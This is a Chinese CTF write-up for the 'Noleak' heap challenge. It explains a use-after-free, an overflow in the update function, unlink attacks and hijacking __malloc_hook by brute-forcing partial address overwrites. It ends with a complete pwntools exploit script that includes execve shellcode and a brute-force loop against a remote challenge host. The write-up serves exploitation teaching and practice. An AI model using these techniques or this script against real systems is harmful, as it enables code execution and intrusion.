2020-02-13 21:52:33 by hawkJW
题目附件、ida文件及wp链接
这道题考察的比较综合,设置到方方面面的知识点,这里记录一下
首先,还是老规矩,看一下保护情况
可以看到,RELRO保护全开,则没有办法修改got表了,同时开启了Canary保护,栈溢出可能也有一定困难;但是我们看到,有NX没有开启,且PIE是关闭的。所以保护措施还是比较一般的。下面我们具体看一下程序的流程
实际上,我们发现这个流程还是比较简单的,和不同的菜单题目十分相似,有创建、更新以及删除选项。但是不同的是,没有显示选项,也就是说,我们实际上没法获取运行时具体的内存等的分布情况。
实际上,这个漏洞是一个综合漏洞——就是设置多方面的知识。下面我们一一进行介绍。
首先浏览程序源代码。实际上,基本没有什么可利用漏洞,但是仍然发现了——free掉函数之后并没有置0,也就是UAF,如图所示
但是实际上仅仅没有置0能做的事情还是有限的,这里还有配合的漏洞部分。
也就是,当我们准备 update() 的时候,对于输入的大小并没有检查。那么通过UAF以及这个可以写入任意长的数据的漏洞,就可以做很多事情了——可以修改通过 malloc 获取的chunk的详细信息了。
我们还需要在注意一下,简单介绍一下整个程序的数据结构部分。
如图所示,实际上有一个buf数组,每次通过 create() 生成一个实例,该实例实际上就是由 malloc() 生成的一个chunk块,当然,在buf数组中存放的是实际上可写的部分,也就是chunk块的头部之后的地址。这就是程序的大体结构。下面我们继续分析漏洞。
首先正如程序名字所表明的,该程序没有回显,没有办法通过leak来进行构造。因此,我们实际上需要做的,是通过可以预见的地址或是程序行为来实现的一个漏洞。我们先尝试分析一下什么是可以预见的程序行为以及漏洞——由于没有开启PIE,因此所有的代码段、全局未出世变量段以及数据段等都是固定不变的,也就是可预见的;所有程序的机制,例如malloc的内存分配机制以及free的内存管理机制等仍然是固定的;由于系统采用的是页式管理,所以任何地址的16进制的后三位都将保持不变。当然,也可能有更多的可预见的部分,但是,我们的漏洞将主要利用到这三点。
那么第一点,上面的数据结构的地址,buf的值首先都是固定且不变的。而且由于程序的漏洞,buf数组中的每一个地址都可以写任意长度的数据,也可以进行 free() 操作,实际上,有了这些,我们可以进行unlink攻击,实现任意地址的写入——具体如何实现unlink攻击,我们将在后面的漏洞利用中描述。
好了,我们实现了任意地址的写,但是看起来并没有什么用——我们想要往got表中写入 system 函数的地址,但是这需要got表的地址,但是由于没有回显函数,这又是一件比较困难的事情。看似问题走上了无解,实则解决方案隐藏在 malloc 函数中。实际上,malloc机制中的unsorted bin、small bins以及large bins中的双向链表中的第一个chunk以及最后一个chunk中的 fd\bk 字段,都指向了一个结构(类型为malloc_state,变量名称为arena)的固定偏移的位置,而在这个结构之上的固定偏移位置,则是 __malloc_hook 的地址(其值被默认设置为null),那么我们清楚,如果我们将 __malloc_hook 的值改变为某一代码段的地址,则当我们调用 malloc 函数的时候,会变成直接执行 __malloc_hook 所指向的代码。介绍了上面这些,实际上大体的思路就出来了——由于释放的chunk我们还能在写入,因此我们可以修改被释放的chunk的 fd、bk 字段,从而让buf中含有伪造的chunk,并且通过让该伪造的chunk成为双向链表中的第一个或最后一个,从而让其 fd/bk 字段中的值为对应结构的偏移,这是由于任何地址的后3位保持不变,则我们可以通过覆盖的方式来覆盖掉 fd/bk 的2字节(因为只有16进制地址的后三位不变,而2字节则是后四位,因此这里需要爆破一下),使该值变为 __malloc_hook 的地址。而由于这个chunk是在buf中伪造的,因此,我们可以向其中,也就是对应的 fd/bk 字段所指向的地址写入内容。此时我们在利用之前通过unlink得到的任意地址写入的能力,向一个固定地址写入一段shellcode,并将该固定地址的值写入到对应的 __malloc_hook 中,也就是 fd/bk 所指向的地址中即可。此时,我们只需要在调用一次 malloc ,即可以执行该shellcode,从而获得shell!
当然,可能还是有点抽象,我将在漏洞利用中,进而具体的进行讲解。
我们先简单介绍一下unlink的实现方式。如果我们有如下的条件
如果我们有一个指针,其指向一块内存,且可以写入足够长的数据;我们还可以 free 掉address2处的chunk(chunk2的大小不属于fast bins),那么我们就可以执行unlink攻击,我们首先向指针所指向的内容写如下的内容,从而在指针所指向的地方伪造处一个chunk,如图所示
我们在address1 + 2 * SIZE_SZ处构造了一个chunk,并且输入的长度溢出到了chunk2的头,从而使伪造的chunk与chunk2成为合法的物理上相邻的chunk,需要注意的是,如果此时我们释放chunk2,那么按照unlink机制,其将合并伪造的chunk,也就是先检查伪造chunk是否满足
chunk->fd->bk == 伪造chunk &&伪造chunk->bk->fd == 伪造chunk
,如果通过的话,在执行
伪造chunk->fd->bk == 伪造chunk->bk;
伪造chunk->bk->fd == 伪造chunk->fd;
那么,如果我们让伪造chunk的 fd 字段的值为 (&ptr)-3*SIZE_SZ ,令伪造的chunk的 bk 字段的值为 (&ptr)-2*SIZE_SZ ,那么我们代入就会发现,可以顺利通过检验,并且最终会有 ptr = (&ptr)-3*SIZE_SZ ,那么我们只需要输入 '\x00‘ * 3 * SIZE_SZ + address ,则此时ptr中所指向的内容变成了address,而由于之前说的,我们可以向ptr中所指向的地址写入,因此,我们可以向address中写入内容。这就实现了unlink攻击。
下面我们在Noleak中应用unlink攻击,我们首先使用两个create,buf中的结构变成如图所示
实际上,现在正好符合我们所说的,unlink的条件,首先ptr,也就是图中的0x601040,而chunk2,其地址也就指的是0x601048中的值,即0x6020b0。那么,按照之前所说的,我们输入对应的payload,结果如下
我们成功的在chunk1中构造了一个和chunk2物理上相连的伪造chunk,且伪造chunk中的 fd、bk字段也符合前面所讲的,因此,我们释放掉chunk2,从而实现unlink攻击,如图所示
可以看到,首先,确实将buf——也就是ptr的值改变为了ptr - 3 * SIZE_SZ;第二,chunk2与伪造chunk确实进行了合并,因为chunk2物理相邻的下一个chunk就是top,因此皆合并如了top中。
下面,我们我们再次向ptr所指向的内容——buf - 3 * SIZE_SZ中输入,让buf[1]中的值指向buf,以此可以随时进行任意地址的写入;让buf[0]的值指向其他地址固定的大片内存,从而放入shellcode,如图所示
好了,大体上的任务就基本结束了——但是还剩下一个最为重要的,就是获取 __malloc_hook 的地址。这里还是按照上面的漏洞利用中所说的,通过在buf中构造一个伪造chunk,并通过 free ,将该伪造chunk变为unsorted bin中的双向链表中的第一个或最后一个,从而让该chunk中的一些字段——或者说buf中的一些下标中含有arena,再通过地址覆盖,从而实现获取到 __malloc_hook
实际上,构造伪造的chunk,在上面已经构造好了——在地址0x601060处,实际上就是一个伪造的chunk,下面我们首先获取到一个unsorted bin中的chunk,如图所示
此时,如果我们将0x602010处的chunk的 bk 字段中的值设置为伪造chunk的地址,那么,如果我们在malloc一个和0x602010处的chunk同样大小(经过转换的,实际请求的大小应该是chunk的大小减去0x8),那么根据malloc的机制,伪造的chunk将成为unsorted bin中的唯一一个bin,那么必然的,其对应的字段将包含arena的地址。如图所示
此时,如果我们申请一个和0x602010一样大小的chunk,那么
如我们之前所分析的一样,unsorted bin中只剩一个chunk,也就是那个伪造的chunk,而该伪造的chunk中的fd字段,也就包含这偏离arena固定的距离的地址——至于为什么是fd字段,这个设计malloc分配,再具体的,就是unsorted bin是如何进行分配的机制,感兴趣的可以自己在认真阅读一下malloc的源代码,这里就不在讲了——因为再讲文章就太长了。
好了,此时我们在看一下 __malloc_hook 的地址到底是多少
当然,虽然每一次的地址都是变化的,但正如前面所分析,地址的16进制的后三位是始终不变的,而我们发现,实际上 __malloc_hook 的地址和我们获取到的那个地址也仅仅是后三位不一样,那么,问题一下就变得简单起来了——因为buf[1]中的地址是buf,那么我们可以通过想buf[1]中的地址写入数据,从而来覆盖掉0x601070处地址的2个字节——即0x601070处地址的16进制的后4位。但是由于位数不一样,因此,最终0x601070处的地址很可能与 __malloc_hook 的地址不是一样的,会相差16进制地址的倒数第四位,那么怎么办呢?实际上,如果有回显的话,就不出现这种问题。但是由于没有回显,则我们只能进行爆破,让我们写入的地址恰好碰撞上 __malloc_hook 的地址。如果碰撞上后,就很简单了,将shellcode的地址,即0x601020写入到 __malloc_hook 即可。这样也就完成了漏洞利用。
具体的就不多说了,贴上完整的wp
#coding:utf-8
from pwn import *
#context.log_level = 'debug'
debug = 1
lib = ELF('./Noleak_libc')
def wp_create(size, data):
r.recvuntil('Wellcome To the Heap World\n')
r.send('1'.ljust(8, '\x00'))
r.send(str(size).ljust(8, '\x00'))
r.send(data.ljust(size, '\x00'))
def wp_delete(index):
r.recvuntil('Wellcome To the Heap World\n')
r.send('2'.ljust(8, '\x00'))
r.send(str(index).ljust(8, '\x00'))
def wp_update(index, data):
r.recvuntil('Wellcome To the Heap World\n')
r.send('3'.ljust(8, '\x00'))
r.send(str(index).ljust(8, '\x00'))
r.send(str(len(data)).ljust(8, '\x00'))
r.send(data)
def wp_exit():
r.recvuntil('Wellcome To the Heap World\n')
r.send('4'.ljust(8, '\x00'))
def wp_main():
# 指的是能包括__malloc_hook的fastbin的低三位地址
__malloc_hook_fastbin_l3b = (lib.symbols['__malloc_hook'] & 0xfff) | 0x1000
bss_address = 0x0000000000601020
# unlink攻击, buf[0] = buf[-3]
wp_create(0x98, 'a') #index:0
wp_create(0x98, 'a') #index:1
wp_update(0, p64(0x0) + p64(0x91) + p64(0x0000000000601040 - 0x18) + p64(0x0000000000601040 - 0x10) + p64(0) * 7 * 2 + p64(0x90) + p64(0xa0))
wp_delete(1) # buf[0]值为0x601020 buf[1]值为buf
wp_update(0, p64(0) * 3 + p64(bss_address) + p64(0x0000000000601040) + p64(0) * 0x3 + p64(0x20))
wp_create(0x100, 'a') #index:2
wp_create(0x100, 'a') #index:3
wp_delete(2)
wp_update(2, p64(0) + p64(0x0000000000601040 + 0x8 * 4))
wp_create(0x100, 'a') #index:4
wp_update(1, p64(bss_address) + '/bin/sh\x00' + p64(0) * 4 + p64(__malloc_hook_fastbin_l3b)[:2])
wp_update(6, p64(bss_address))
shellcode = "\x48\x31\xc0\x48\xc7\xc0\x3b\x00\x00\x00\x48\x31\xff\x48\xc7\xc7\x48\x10\x60\x00\x48\x31\xf6\x48\x31\xd2\x0f\x05"
wp_update(0, shellcode)
r.recvuntil('Wellcome To the Heap World\n')
r.send('1'.ljust(8, '\x00'))
r.send(str(0x20).ljust(8, '\x00'))
for i in range(0x20):
r.recv(timeout = 0.1)
while True:
try:
log.info("[*] try to crack-------\n")
if debug == 1:
r = process('./Noleak')
gdb.attach(r)
pause() # 进行下断点
else:
r = remote('111.198.29.45', 45427)
wp_main()
r.interactive()
break
except EOFError:
r.close()
continue